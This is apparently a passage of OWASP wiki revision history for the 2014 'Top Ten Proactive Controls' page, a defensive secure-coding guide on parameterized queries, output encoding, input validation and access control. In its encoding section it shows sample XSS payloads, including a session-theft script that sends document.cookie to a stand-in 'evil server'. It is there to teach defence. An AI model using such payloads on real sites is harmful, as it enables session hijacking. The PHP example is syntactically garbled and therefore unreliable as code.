Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet<br />
* https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model<br />
* https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project<br />
* https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* https://www.owasp.org/index.php/Threat_Modeling_Cheat_Sheet<br />
<br />
<br />
== Additional References ==<br />
<br />
[[OWASP Top Ten Project]]<br/><br />
[[OWASP Mobile Security Project]]<br/><br />
[[OWASP Secure Coding Practices - Quick Reference Guide]]<br/><br />
[[OWASP Cornucopia]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=172312OWASP Proactive Controls2014-04-10T19:30:14Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide<br />
<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to Cross Site Scripting. Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* https://www.owasp.org/index.php/OWASP_Java_Encoder_Project<br />
* https://www.owasp.org/index.php/Category:OWASP_EnDe<br />
* https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet<br />
<br />
'''Key Tools'''<br />
* https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project<br />
* https://www.owasp.org/index.php/OWASP_JSON_Sanitizer<br />
* https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer<br />
* https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API<br />
* https://www.owasp.org/index.php/OWASP_EJSF_Project<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused. Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* https://www.owasp.org/index.php/OWASP_PHPRBAC_Project<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the Google KeyCzar project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* https://www.owasp.org/index.php/O-Saft<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7: Implement Logging, Error Handling and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet<br />
* https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model<br />
* https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project<br />
* https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* https://www.owasp.org/index.php/Threat_Modeling_Cheat_Sheet<br />
<br />
<br />
== Additional References ==<br />
<br />
[[OWASP Top Ten Project]]<br/><br />
[[OWASP Mobile Security Project]]<br/><br />
[[OWASP Secure Coding Practices - Quick Reference Guide]]<br/><br />
[[OWASP Cornucopia]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=172311OWASP Proactive Controls2014-04-10T19:29:07Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
